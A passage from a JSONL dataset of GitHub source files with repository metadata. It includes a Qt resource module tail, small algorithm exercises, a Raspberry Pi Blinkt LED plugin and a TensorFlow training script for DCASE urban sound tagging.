x3c\\x95\\x96\\\n\\x00\\x00\\x01\\x6a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x35\\xae\\\n\\x00\\x00\\x01\\x78\\x7f\\x3f\\x55\\x08\\\n\\x00\\x00\\x01\\x9a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x42\\x68\\\n\\x00\\x00\\x01\\x78\\x7f\\x3f\\xc9\\xb2\\\n\\x00\\x00\\x01\\x82\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x3b\\xbb\\\n\\x00\\x00\\x01\\x78\\x7f\\x40\\x02\\x37\\\n\\x00\\x00\\x01\\xb2\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x49\\x0a\\\n\\x00\\x00\\x01\\x78\\x7f\\x40\\x49\\xa6\\\n\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xed\\x7a\\\n\\x00\\x00\\x01\\x78\\x7f\\x40\\x85\\xf9\\\n\\x00\\x00\\x01\\x3a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x28\\x77\\\n\\x00\\x00\\x01\\x78\\x7f\\x40\\xb9\\xcf\\\n\\x00\\x00\\x01\\x52\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x2f\\x16\\\n\\x00\\x00\\x01\\x78\\x7f\\x40\\xf1\\x12\\\n\\x00\\x00\\x00\\xce\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x06\\x69\\\n\\x00\\x00\\x01\\x78\\x7f\\x41\\x25\\xef\\\n\\x00\\x00\\x01\\x22\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x21\\xc4\\\n\\x00\\x00\\x01\\x78\\x7f\\x41\\x61\\x79\\\n\\x00\\x00\\x01\\x04\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x15\\x65\\\n\\x00\\x00\\x01\\x78\\x7f
\\xf2\\x13\\xac\\\n\\x00\\x00\\x00\\x98\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xf4\\x1c\\\n\\x00\\x00\\x01\\x78\\x7f\\xf2\\xd8\\x54\\\n\"\n\nqt_version = [int(v) for v in QtCore.qVersion().split('.')]\nif qt_version < [5, 8, 0]:\n rcc_version = 1\n qt_resource_struct = qt_resource_struct_v1\nelse:\n rcc_version = 2\n qt_resource_struct = qt_resource_struct_v2\n\ndef qInitResources():\n QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)\n\ndef qCleanupResources():\n QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)\n\nqInitResources()\n","repo_name":"operepo/ope","sub_path":"client_tools/svc/lock_screen_widget_qrc.py","file_name":"lock_screen_widget_qrc.py","file_ext":"py","file_size_in_byte":360215,"program_lang":"python","lang":"ja","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"26070822862","text":"from operator import itemgetter\nimport math\n\ndef arg(_next, cur, prev) -> float:\n if _next == cur:\n return math.inf\n\n dx0 = _next[0] - cur[0]\n dy0 = _next[1] - cur[1]\n dx1 = cur[0] - prev[0]\n dy1 = cur[1] - prev[1]\n num = dx0 * dx1 + dy0 * dy1\n den = math.sqrt((dx0 * dx0 + dy0 * dy0)* (dx1 * dx1 + dy1 * dy1))\n return math.acos(num / den)\n\ndef convex_hull(points: list[(int, int)]) -> list[(int, int)]:\n prev = min(points, key=itemgetter(0))\n cur = min(points, key=lambda pt: arg(pt, prev, (prev[0], prev[1] - 1)))\n ret = [prev, cur]\n while ret[0] != ret[-1]:\n n = min(points, key=lambda pt: arg(pt, ret[-1], ret[-2]))\n ret.append(n)\n return ret\n\ndef main():\n points = [(0, 0), (10, 10), (0, 10), (10, 0), (5, 5), (2, 2), (1, 3), (2, -20), (-1, 2)]\n ret = convex_hull(points)\n print(ret)\n\nif __name__ == '__main__':\n main()","repo_name":"ar90n/lab","sub_path":"sandbox/algorithm/math/convex_hull_jarvis.py","file_name":"convex_hull_jarvis.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"29023681586","text":"'''\nEscreva uma função com parâmetros chamada multiplo(x, y). 
\nEsta função deve receber dois números e retornar True se o primeiro for múltiplo do segundo número; a função retorna False caso contrário.\n'''\n\ndef multiplo(x, y):\n if (x % y == 0):\n return True\n else:\n return False\n\nprint(multiplo(5, 10))\nprint(multiplo(50, 10))","repo_name":"igorverse/CC8210-programacao-avancada-I","sub_path":"aulas_de_lab/aula5/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38262534915","text":"#coding: utf-8\nimport os\nimport paddlehub as hub\n\n# 2、加载模型\nhumanseg = hub.Module(name='deeplabv3p_xception65_humanseg')\n\n# 3、获取文件列表\n# 图片文件的目录\npath = '/home/SENSETIME/zhangjunwei/data/zhangjw/project/AttentionedDeepPaint/koutu/imgs/'\n# 获取目录下的文件\nfiles = os.listdir(path)\nprint(\"file is: \",files)\n\n# 用来装图片的\nimgs = []\n# 拼接图片路径\nfor i in files:\n imgs.append(path + i)\n print(\"imgs is: \",imgs)\n#抠图\nresults = humanseg.segmentation(data={'image':imgs})","repo_name":"zhangjw19321/auto_paint","sub_path":"AttentionedDeepPaint/koutu/paddle_koutu.py","file_name":"paddle_koutu.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3434553650","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def partition(self, head: Optional[ListNode], x: int) -> Optional[ListNode]:\n if not head or not head.next:\n return head\n less_head, less_tail = None, None\n greater_head, greater_tail = None, None\n while head:\n if head.val < x:\n if not less_head:\n less_head = head\n less_tail = head\n else:\n less_tail.next = head\n less_tail = less_tail.next\n if greater_tail:\n greater_tail.next = head.next\n elif head.val >= x:\n if not greater_head:\n greater_head = head\n greater_tail = head\n else:\n greater_tail.next = head\n greater_tail = greater_tail.next\n head = head.next\n if less_tail:\n less_tail.next = greater_head\n return less_head\n return greater_head\n","repo_name":"jlcarr/LeetCode","sub_path":"Problem_0086/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16795205115","text":"import blinkt\nfrom tallypi.webapp.light.base import AbstractLight\nimport logging\nimport inspect\n\nlogger = logging.getLogger('light')\n\nclass Light(AbstractLight):\n name = 'light'\n keyword = 'light'\n\n def __init__(self):\n blinkt.set_clear_on_exit(True)\n blinkt.clear()\n blinkt.show()\n\n def setColor(self, red, green, blue):\n blinkt.set_all(red, green, blue)\n blinkt.show()\n\n def getColor(self):\n r, g, b, brightness = blinkt.get_pixel(0)\n return r, g, b\n\n def setBrightness(self, percent):\n brightness = self.validateBrightness(percent)\n blinkt.set_brightness(brightness)\n blinkt.show()\n\n def getBrightness(self):\n r, g, b, brightness = blinkt.get_pixel(0)\n return brightness\n\n def shutdown(self):\n blinkt.clear()\n blinkt.show()\n\n # This is invoked when installed as a Bottle plugin\n def setup(self, app):\n logger.info(\"Loading Blinkt! pHat\")\n\n self.routes = app\n\n for other in app.plugins:\n if not isinstance(other, Light):\n continue\n if other.keyword == self.keyword:\n raise PluginError(\"Found another instance of the Blinkt! 
pHat driver running!\")\n\n self.test()\n\n # This is invoked within Bottle as part of each route when installed\n def apply(self, callback, context):\n conf = context.get('light') or {}\n keyword = conf.get('keyword', self.keyword)\n\n args = inspect.getargspec(callback)[0]\n if keyword not in args:\n return callback\n\n def wrapper(*args, **kwargs):\n kwargs[self.keyword] = self\n rv = callback(*args, **kwargs)\n return rv\n return wrapper\n\n # De-installation from Bottle as a plugin\n def close(self):\n self.shutdown()\n\nclass PluginError(Exception):\n pass\n\nPlugin = Light\n","repo_name":"deckerego/tally_pi","sub_path":"lib/tallypi/webapp/light/blinkt.py","file_name":"blinkt.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"72"} +{"seq_id":"3455694272","text":"#plugin example\nimport pprint\n\n\nclass Plugin:\n \"\"\" don't modify here \"\"\"\n def __init__(self, packets=[], current_row=0):\n self.packets = packets\n self.current_row = current_row\n print(\"Plugin loaded ...\")\n def run(self, istart=2500, istop=2574):\n print('current row')\n print(self.current_row)\n\n last_time = 0\n num_TC = 0\n total_size = 0\n num_TM = 0\n counter = {}\n for packet in self.packets[istart:istop]:\n header = packet['header']\n if header['service_type'] == 20 and header[\n 'service_subtype'] == 128:\n continue\n leng = header['raw_length']\n spid = header['SPID']\n extra = ''\n extra2 = ''\n if header['TMTC'] == 'TC':\n num_TC += 1\n leng = 0\n extra2 = ';'\n else:\n #if int(header['SPID']) not in :\n # continue\n total_size += header['raw_length']\n num_TM += 1\n apid = header['apid']\n if apid not in counter:\n counter[apid] = 0\n counter[apid] += header['raw_length']\n extra = ';'\n if spid == 54102:\n if header['SCET'] < last_time + 14:\n continue\n last_time = header['SCET']\n print('TM Total size,', total_size)\n print('APID, length')\n for key, value in counter.items():\n print('{}, {}'.format(key, value))\n print('Number of TM,', num_TM)\n print('Number of TC,', num_TC)\n","repo_name":"elastufka/stix-data-center-pipeline","sub_path":"stix/ui/plugins/packet_size_calculation.py","file_name":"packet_size_calculation.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73181055272","text":"#문제 해석 시작시간 : AP 2:45\n#N개의 동전을 가지고 있을 때, 이 동전들로 만들수 없는 가장 최소 금액을 판단하라\n\n\n\nimport itertools\nimport sys\n\nN = int(sys.stdin.readline())\ncoin = list(map(int,sys.stdin.readline().split()))\nlst = set()\nfor i in range(1,N+1):\n x = itertools.combinations(coin,i)\n for i in x:\n lst.add(sum(i))\n\ncheck = 1\nwhile True:\n if check not in lst:\n print(check)\n break\n else:\n check = check + 1\n","repo_name":"Younggil-kim/Algorithm_with_python","sub_path":"그리디/만들 수 없는 금액_314page.py","file_name":"만들 수 없는 금액_314page.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15155445679","text":"#!/usr/bin/env python3\nN = int(input())\ncolor = [int(input()) for _ in range(N)]\n\ns = sum(color)\nif s == 0 or s == N:\n print(-1)\n exit()\n\nli = [[0, 1][color[i - 2] == color[i - 1] == color[i]] for i in range(N)]\ns = max(map(len, (''.join(map(str, li)) * 2).split('0')))\nprint((s + 1) // 2 + 1)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source 
Codes/AtCoder/arc024/B/3920082.py","file_name":"3920082.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"30679718125","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 19 23:57:27 2020\n\n@author: dcase\n\"\"\"\n\nimport argparse\nimport csv\nimport datetime\nimport json\nimport gzip\nimport os\nimport numpy as np\nimport pandas as pd\nimport oyaml as yaml\nimport random\nimport pickle as pk\nimport metrics\nimport tensorflow as tf\n#import keras\n#from keras.layers import Input, Dense, TimeDistributed\n#from keras.models import Model\n#from keras import regularizers\n#from keras.optimizers import Adam\nimport keras.backend as K\nfrom sklearn.preprocessing import StandardScaler\n#from autopool import AutoPool1D\nfrom models import CNN9_train,CRNN9_train,CNN7_train,CNN9_Res_train\nfrom functions import calculate_scalar_of_tensor,scale\n\nNUM_HOURS = 24\nNUM_DAYS = 7\nNUM_WEEKS = 52\n\n\n## HELPERS\n\ndef load_train_data(file_list, train_file_idxs, feature_dir):\n \n train_data = []\n for train_id in train_file_idxs:\n data_path = os.path.join(feature_dir, file_list[train_id][:-4]+'.npy')\n train_data.append(np.load(data_path))\n train_data = np.asarray(train_data)\n \n return train_data\n\ndef get_subset_split(annotation_data):\n \"\"\"\n Get indices for train and validation subsets\n\n Parameters\n ----------\n annotation_data\n\n Returns\n -------\n train_idxs\n valid_idxs\n\n \"\"\"\n\n # Get the audio filenames and the splits without duplicates\n data = annotation_data[['split', 'audio_filename', 'annotator_id']]\\\n .groupby(by=['split', 'audio_filename'], as_index=False)\\\n .min()\\\n .sort_values('audio_filename')\n\n train_idxs = []\n valid_idxs = []\n\n for idx, (_, row) in enumerate(data.iterrows()):\n if row['split'] == 'train':\n train_idxs.append(idx)\n # elif row['split'] == 'validate':\n elif row['split'] == 'validate' and row['annotator_id'] <= 0:\n # For validation examples, only use verified annotations\n valid_idxs.append(idx)\n\n return np.array(train_idxs), np.array(valid_idxs)\n\ndef gen_train_batch(train_data,train_meta,train_label,batch_size):\n\n num = train_data.shape[0]\n arr = np.arange(num)\n np.random.shuffle(arr)\n train_data = train_data[arr]\n train_label = train_label[arr]\n for index in range(0,len(train_data),batch_size): \n if (index+batch_size)<=(len(train_data)):\n excerpt = slice(index, index + batch_size)\n else:\n excerpt = slice(index,len(train_data))\n yield train_data[excerpt], train_meta[excerpt], train_label[excerpt]\n \ndef gen_val_batch(val_data, val_meta, batch_size):\n\n for index in range(0,len(val_data),batch_size): \n if (index+batch_size)<=(len(val_data)):\n excerpt = slice(index, index + batch_size)\n else:\n excerpt = slice(index,len(val_data))\n yield val_data[excerpt], val_meta[excerpt]\n\n\ndef get_file_targets(annotation_data, labels):\n \"\"\"\n Get file target annotation vector for the given set of labels\n\n Parameters\n ----------\n annotation_data\n labels\n\n Returns\n -------\n targets\n\n \"\"\"\n file_list = annotation_data['audio_filename'].unique().tolist()\n count_dict = {fname: {label: 0 for label in labels} for fname in file_list}\n\n for _, row in annotation_data.iterrows():\n fname = row['audio_filename']\n split = row['split']\n ann_id = row['annotator_id']\n\n # For training set, only use crowdsourced annotations\n if split == \"train\" and ann_id <= 0:\n continue\n\n # For 
validate and test sets, only use the verified annotation\n # if split != \"train\" :\n if split != \"train\" and ann_id != 0:\n continue\n\n for label in labels:\n count_dict[fname][label] += row[label + '_presence']\n\n targets = np.array([[1.0 if count_dict[fname][label] > 0 else 0.0 for label in labels]\n for fname in file_list])\n\n return targets\n\ndef generate_output_file(y_pred, file_idxs, results_dir, file_list, label_mode, taxonomy):\n \"\"\"\n Write the output file containing model predictions\n\n Parameters\n ----------\n y_pred\n file_idxs\n results_dir\n file_list\n label_mode\n taxonomy\n\n Returns\n -------\n\n \"\"\"\n output_path = os.path.join(results_dir, \"output.csv\")\n file_list = [file_list[idx] for idx in file_idxs]\n\n coarse_fine_labels = [[\"{}-{}_{}\".format(coarse_id, fine_id, fine_label)\n for fine_id, fine_label in fine_dict.items()]\n for coarse_id, fine_dict in taxonomy['fine'].items()]\n\n full_fine_target_labels = [fine_label for fine_list in coarse_fine_labels\n for fine_label in fine_list]\n coarse_target_labels = [\"_\".join([str(k), v])\n for k,v in taxonomy['coarse'].items()]\n\n with open(output_path, 'w') as f:\n csvwriter = csv.writer(f)\n\n # Write fields\n fields = [\"audio_filename\"] + full_fine_target_labels + coarse_target_labels\n csvwriter.writerow(fields)\n\n # Write results for each file to CSV\n for filename, y, in zip(file_list, y_pred):\n row = [filename]\n\n if label_mode == \"fine\":\n fine_values = []\n coarse_values = [0 for _ in range(len(coarse_target_labels))]\n coarse_idx = 0\n fine_idx = 0\n for coarse_label, fine_label_list in zip(coarse_target_labels,\n coarse_fine_labels):\n for fine_label in fine_label_list:\n if 'X' in fine_label.split('_')[0].split('-')[1]:\n # Put a 0 for other, since the baseline doesn't\n # account for it\n fine_values.append(0.0)\n continue\n\n # Append the next fine prediction\n fine_values.append(y[fine_idx])\n\n # Add coarse level labels corresponding to fine level\n # predictions. 
Obtain by taking the maximum from the\n # fine level labels\n coarse_values[coarse_idx] = max(coarse_values[coarse_idx],\n y[fine_idx])\n fine_idx += 1\n coarse_idx += 1\n\n row += fine_values + coarse_values\n\n else:\n # Add placeholder values for fine level\n row += [0.0 for _ in range(len(full_fine_target_labels))]\n # Add coarse level labels\n row += list(y)\n\n csvwriter.writerow(row)\n\n\n## DATA PREPARATION\n\ndef one_hot(idx, num_items):\n return [(0.0 if n != idx else 1.0) for n in range(num_items)]\n\n\ndef prepare_data(train_file_idxs, valid_file_idxs,\n latitude_list, longitude_list, week_list, day_list, hour_list,\n target_list, standardize=True):\n \"\"\"\n Prepare inputs and targets for MIL training using training and validation indices.\n Parameters\n ----------\n train_file_idxs\n valid_file_idxs\n latitude_list\n longitude_list\n week_list\n day_list\n hour_list\n embeddings\n target_list\n standardize\n Returns\n -------\n X_train\n y_train\n X_valid\n y_valid\n scaler\n \"\"\"\n\n\n X_train_loc = np.array([[[latitude_list[idx],\n longitude_list[idx]]]\n for idx in train_file_idxs])\n X_valid_loc = np.array([[[latitude_list[idx],\n longitude_list[idx]]]\n for idx in valid_file_idxs])\n\n X_train_time = np.array([\n [one_hot(week_list[idx] - 1, NUM_WEEKS) \\\n + one_hot(day_list[idx], NUM_DAYS) \\\n + one_hot(hour_list[idx], NUM_HOURS)]\n for idx in train_file_idxs])\n X_valid_time = np.array([\n [one_hot(week_list[idx] - 1, NUM_WEEKS) \\\n + one_hot(day_list[idx], NUM_DAYS) \\\n + one_hot(hour_list[idx], NUM_HOURS)]\n for idx in valid_file_idxs])\n\n X_train_cts = X_train_loc\n X_valid_cts = X_valid_loc\n\n y_train = np.array([target_list[idx] for idx in train_file_idxs])\n y_valid = np.array([target_list[idx] for idx in valid_file_idxs])\n\n if standardize:\n # Only standardize continuous valued inputs (embeddings + location)\n scaler = StandardScaler()\n scaler.fit(np.array([feat for feat_grp in X_train_cts for feat in feat_grp]))\n\n X_train_cts = np.array([scaler.transform(emb_grp) for emb_grp in X_train_cts])\n X_valid_cts = np.array([scaler.transform(emb_grp) for emb_grp in X_valid_cts])\n else:\n scaler = None\n\n # Concatenate all of the inputs\n X_train = np.concatenate((X_train_cts, X_train_time), axis=-1)\n X_valid = np.concatenate((X_valid_cts, X_valid_time), axis=-1)\n\n\n return X_train, y_train, X_valid, y_valid, scaler\n\n\n## MODEL TRAINING\n\n\ndef train(annotation_path, taxonomy_path, train_feature_dir, val_feature_dir,\n output_dir, load_checkpoint, load_checkpoint_path, \n exp_id, label_mode, \n batch_size=32, n_epochs=100, kernel_size=3, \n layer_depth = [64,128,256,512], chs = 1, max_ckpt = 20,\n lr=1e-3, hidden_layer_size=256, snapshot = 5,\n num_hidden_layers=1, standardize=True,\n timestamp=None):\n \"\"\"\n Train and evaluate a MIL MLP model.\n Parameters\n ----------\n annotation_path\n emb_dir\n output_dir\n label_mode\n batch_size\n num_epochs\n patience\n learning_rate\n hidden_layer_size\n l2_reg\n standardize\n timestamp\n random_state\n\n Returns\n -------\n \"\"\"\n\n\n # Load annotations and taxonomy\n print(\"* Loading dataset.\")\n annotation_data = pd.read_csv(annotation_path).sort_values('audio_filename')\n with open(taxonomy_path, 'r') as f:\n taxonomy = yaml.load(f, Loader=yaml.Loader)\n\n annotation_data_trunc = annotation_data[['audio_filename',\n 'latitude',\n 'longitude',\n 'week',\n 'day',\n 'hour']].drop_duplicates()\n file_list = annotation_data_trunc['audio_filename'].to_list()\n latitude_list = 
annotation_data_trunc['latitude'].to_list()\n longitude_list = annotation_data_trunc['longitude'].to_list()\n week_list = annotation_data_trunc['week'].to_list()\n day_list = annotation_data_trunc['day'].to_list()\n hour_list = annotation_data_trunc['hour'].to_list()\n\n full_fine_target_labels = [\"{}-{}_{}\".format(coarse_id, fine_id, fine_label)\n for coarse_id, fine_dict in taxonomy['fine'].items()\n for fine_id, fine_label in fine_dict.items()]\n fine_target_labels = [x for x in full_fine_target_labels\n if x.split('_')[0].split('-')[1] != 'X']\n coarse_target_labels = [\"_\".join([str(k), v])\n for k,v in taxonomy['coarse'].items()]\n\n print(\"* Preparing training data.\")\n\n # For fine, we include incomplete labels in targets for computing the loss\n fine_target_list = get_file_targets(annotation_data, full_fine_target_labels)\n coarse_target_list = get_file_targets(annotation_data, coarse_target_labels)\n train_file_idxs, valid_file_idxs = get_subset_split(annotation_data)\n\n if label_mode == \"fine\":\n target_list = fine_target_list\n labels = fine_target_labels\n num_classes = len(labels)\n y_true_num = len(full_fine_target_labels)\n elif label_mode == \"coarse\":\n target_list = coarse_target_list\n labels = coarse_target_labels\n num_classes = len(labels)\n y_true_num = num_classes\n else:\n raise ValueError(\"Invalid label mode: {}\".format(label_mode))\n\n \n\n\n X_train_meta, y_train, X_valid_meta, y_valid_meta, scaler \\\n = prepare_data(train_file_idxs, valid_file_idxs,\n latitude_list, longitude_list,\n week_list, day_list, hour_list,\n target_list, standardize=standardize)\n \n print('X_train meta shape', X_train_meta.shape)\n print('y_train shape', y_train.shape)\n print('X_valid_meta shape', X_valid_meta.shape)\n print('y_valid shape', y_valid_meta.shape)\n \n meta_dims = X_train_meta.shape[2]\n \n \n X_train = load_train_data(file_list, train_file_idxs, train_feature_dir)\n X_valid = load_train_data(file_list, valid_file_idxs, val_feature_dir)\n _, frames, bins = X_train.shape\n print('X_train shape', X_train.shape)\n print('X_valid shape', X_valid.shape)\n \n (mean_train, std_train) = calculate_scalar_of_tensor(np.concatenate(X_train,axis=0))\n \n \n model = CNN9_Res_train(kernel_size,layer_depth,num_classes,hidden_layer_size)\n\n if not timestamp:\n timestamp = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\n\n model_path = os.path.join(output_dir, 'exp'+exp_id)\n\n if scaler is not None:\n scaler_path = os.path.join(model_path, 'stdizer.pkl')\n with open(scaler_path, 'wb') as f:\n pk.dump(scaler, f)\n\n if label_mode == \"fine\":\n full_coarse_to_fine_terminal_idxs = np.cumsum(\n [len(fine_dict) for fine_dict in taxonomy['fine'].values()])\n incomplete_fine_subidxs = [len(fine_dict) - 1 if 'X' in fine_dict else None\n for fine_dict in taxonomy['fine'].values()]\n coarse_to_fine_end_idxs = np.cumsum([len(fine_dict) - 1 if 'X' in fine_dict else len(fine_dict)\n for fine_dict in taxonomy['fine'].values()])\n\n # Create loss function that only adds loss for fine labels for which\n # the we don't have any incomplete labels\n def masked_loss(y_true, y_pred):\n loss = None\n for coarse_idx in range(len(full_coarse_to_fine_terminal_idxs)):\n true_terminal_idx = full_coarse_to_fine_terminal_idxs[coarse_idx]\n true_incomplete_subidx = incomplete_fine_subidxs[coarse_idx]\n pred_end_idx = coarse_to_fine_end_idxs[coarse_idx]\n\n if coarse_idx != 0:\n true_start_idx = full_coarse_to_fine_terminal_idxs[coarse_idx-1]\n pred_start_idx = 
coarse_to_fine_end_idxs[coarse_idx-1]\n else:\n true_start_idx = 0\n pred_start_idx = 0\n\n if true_incomplete_subidx is None:\n true_end_idx = true_terminal_idx\n\n sub_true = y_true[:, true_start_idx:true_end_idx]\n sub_pred = y_pred[:, pred_start_idx:pred_end_idx]\n\n else:\n # Don't include incomplete label\n true_end_idx = true_terminal_idx - 1\n true_incomplete_idx = true_incomplete_subidx + true_start_idx\n assert true_end_idx - true_start_idx == pred_end_idx - pred_start_idx\n assert true_incomplete_idx == true_end_idx\n\n # 1 if not incomplete, 0 if incomplete\n mask = K.expand_dims(1 - y_true[:, true_incomplete_idx])\n\n # Mask the target and predictions. If the mask is 0,\n # all entries will be 0 and the BCE will be 0.\n # This has the effect of masking the BCE for each fine\n # label within a coarse label if an incomplete label exists\n sub_true = y_true[:, true_start_idx:true_end_idx] * mask\n sub_pred = y_pred[:, pred_start_idx:pred_end_idx] * mask\n\n if loss is not None:\n loss += K.sum(K.binary_crossentropy(sub_true, sub_pred))\n else:\n loss = K.sum(K.binary_crossentropy(sub_true, sub_pred))\n\n return loss\n \n loss_func = masked_loss\n else:\n \n def unmasked_loss(y_true, y_pred):\n \n loss = None\n loss = K.sum(K.binary_crossentropy(y_true, y_pred))\n return loss\n \n loss_func = unmasked_loss\n\n ### placeholder\n x = tf.placeholder(tf.float32,shape=[None,frames,bins,chs],name='x')\n meta_x = tf.placeholder(tf.float32,shape=[None,meta_dims],name='meta_x')\n y = tf.placeholder(tf.float32,shape=[None,y_true_num],name='y')\n is_training = tf.placeholder(tf.bool,shape=None,name='is_training')\n \n ### net output\n output = model.forward(input_tensor=x,input_meta=meta_x,is_training=is_training)\n sigmoid_output = tf.nn.sigmoid(output,name='sigmoid_output')\n loss = loss_func(y,sigmoid_output)\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) \n learning_rate = tf.Variable(float(lr), trainable=False, dtype=tf.float32)\n learning_rate_decay_op = learning_rate.assign(learning_rate * 0.9)\n with tf.control_dependencies(update_ops): \n# train_op = tf.train.MomentumOptimizer(learning_rate=lr,momentum=momentum).minimize(loss)\n train_op = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss) \n \n \n ### start session\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n saver = tf.train.Saver(max_to_keep=max_ckpt)\n sess=tf.Session(config=config)\n sess.run(tf.global_variables_initializer())\n if load_checkpoint:\n saver.restore(sess,load_checkpoint_path)\n \n \n ### tensorboard summary\n\n train_summary_dir = os.path.join(model_path, 'summaries', 'train')\n train_summary_writer = tf.summary.FileWriter(train_summary_dir,sess.graph) \n \n loss_all=tf.placeholder(tf.float32,shape=None,name='loss_all')\n\n tf.add_to_collection(\"loss\", loss_all)\n\n loss_summary = tf.summary.scalar('loss', loss_all)\n\n \n val_summary_dir = os.path.join(model_path, 'summaries', 'val')\n val_micro_auprc_summary_writer = tf.summary.FileWriter(os.path.join(val_summary_dir,'micro_auprc'), sess.graph)\n val_macro_auprc_summary_writer = tf.summary.FileWriter(os.path.join(val_summary_dir,'macro_auprc'), sess.graph)\n val_val_micro_F1score_summary_writer = tf.summary.FileWriter(os.path.join(val_summary_dir,'micro_F1score'), sess.graph)\n val_summary = tf.placeholder(tf.float32,shape=None,name='loss_all')\n tf.add_to_collection(\"val_summary\", val_summary)\n val_summary_op = tf.summary.scalar('val_summary', val_summary)\n\n ### train loop\n print(\"* Training 
model.\")\n class_auprc_dict = {}\n for epoch in range(n_epochs):\n train_loss = 0 ; n_batch = 0 \n for X_train_batch, X_meta_batch, y_train_batch in gen_train_batch(X_train, X_train_meta, y_train, batch_size):\n \n X_meta_batch = X_meta_batch.reshape(-1,meta_dims)\n X_train_batch = scale(X_train_batch,mean_train,std_train)\n X_train_batch = X_train_batch.reshape(-1,frames,bins,chs)\n _,train_loss_batch = sess.run([train_op,loss],\n feed_dict={x:X_train_batch, meta_x:X_meta_batch, y:y_train_batch, is_training:True})\n train_loss += train_loss_batch ; n_batch += 1\n train_loss = train_loss/n_batch\n train_summary_op = tf.summary.merge([loss_summary])\n train_summaries = sess.run(train_summary_op,feed_dict={loss_all:train_loss})\n train_summary_writer.add_summary(train_summaries, epoch)\n \n print(\"step %d\" %(epoch))\n print(\" train loss: %f\" % (train_loss))\n \n pre = []\n if ((epoch+1) % snapshot == 0 and epoch > 0) or epoch == n_epochs-1:\n sess.run(learning_rate_decay_op)\n \n for val_data_batch, val_meta_batch in gen_val_batch(X_valid, X_valid_meta, batch_size):\n \n val_meta_batch = val_meta_batch.reshape(-1,meta_dims)\n val_data_batch = scale(val_data_batch,mean_train,std_train)\n val_data_batch = val_data_batch.reshape(-1,frames,bins,chs) \n prediction = sess.run(sigmoid_output, feed_dict={x:val_data_batch, \n meta_x: val_meta_batch, is_training:False})\n pre.extend(prediction)\n # print(len(pre))\n generate_output_file(pre, valid_file_idxs, model_path, file_list, label_mode, taxonomy)\n submission_path = os.path.join(model_path, \"output.csv\")\n df_dict = metrics.evaluate(prediction_path=submission_path,annotation_path=annotation_path,\n yaml_path=taxonomy_path,mode=label_mode) \n val_micro_auprc,eval_df = metrics.micro_averaged_auprc(df_dict,return_df=True) \n val_macro_auprc,class_auprc = metrics.macro_averaged_auprc(df_dict,return_classwise=True)\n thresh_idx_05 = (eval_df['threshold']>=0.5).nonzero()[0][0]\n val_micro_F1score = eval_df['F'][thresh_idx_05]\n \n val_summaries = sess.run(val_summary_op,feed_dict={val_summary:val_micro_auprc})\n val_micro_auprc_summary_writer.add_summary(val_summaries, epoch)\n val_summaries = sess.run(val_summary_op,feed_dict={val_summary:val_macro_auprc})\n val_macro_auprc_summary_writer.add_summary(val_summaries, epoch)\n val_summaries = sess.run(val_summary_op,feed_dict={val_summary:val_micro_F1score})\n val_val_micro_F1score_summary_writer.add_summary(val_summaries, epoch)\n class_auprc_dict['class_auprc_'+str(epoch)] = class_auprc\n print('official')\n print('micro',val_micro_auprc)\n print('micro_F1',val_micro_F1score)\n print('macro',val_macro_auprc)\n \n print('-----save:{}-{}'.format(os.path.join(model_path,'ckeckpoint','model'), epoch))\n saver.save(sess, os.path.join(model_path,'ckeckpoint','model'), global_step=epoch)\n\n \n np.save(os.path.join(model_path,'class_auprc_dict.npy'),class_auprc_dict)\n sess.close()\n\n\n\n\n\nif __name__ == '__main__':\n \n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"6\" \n os.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"2\" \n \n parser = argparse.ArgumentParser()\n parser.add_argument(\"--annotation_path\", default='/annotations.csv')\n parser.add_argument(\"--taxonomy_path\", default='/dcase-ust-taxonomy.yaml')\n parser.add_argument(\"--output_dir\", type=str,default='/models')\n parser.add_argument(\"--train_feature_dir\", type=str, 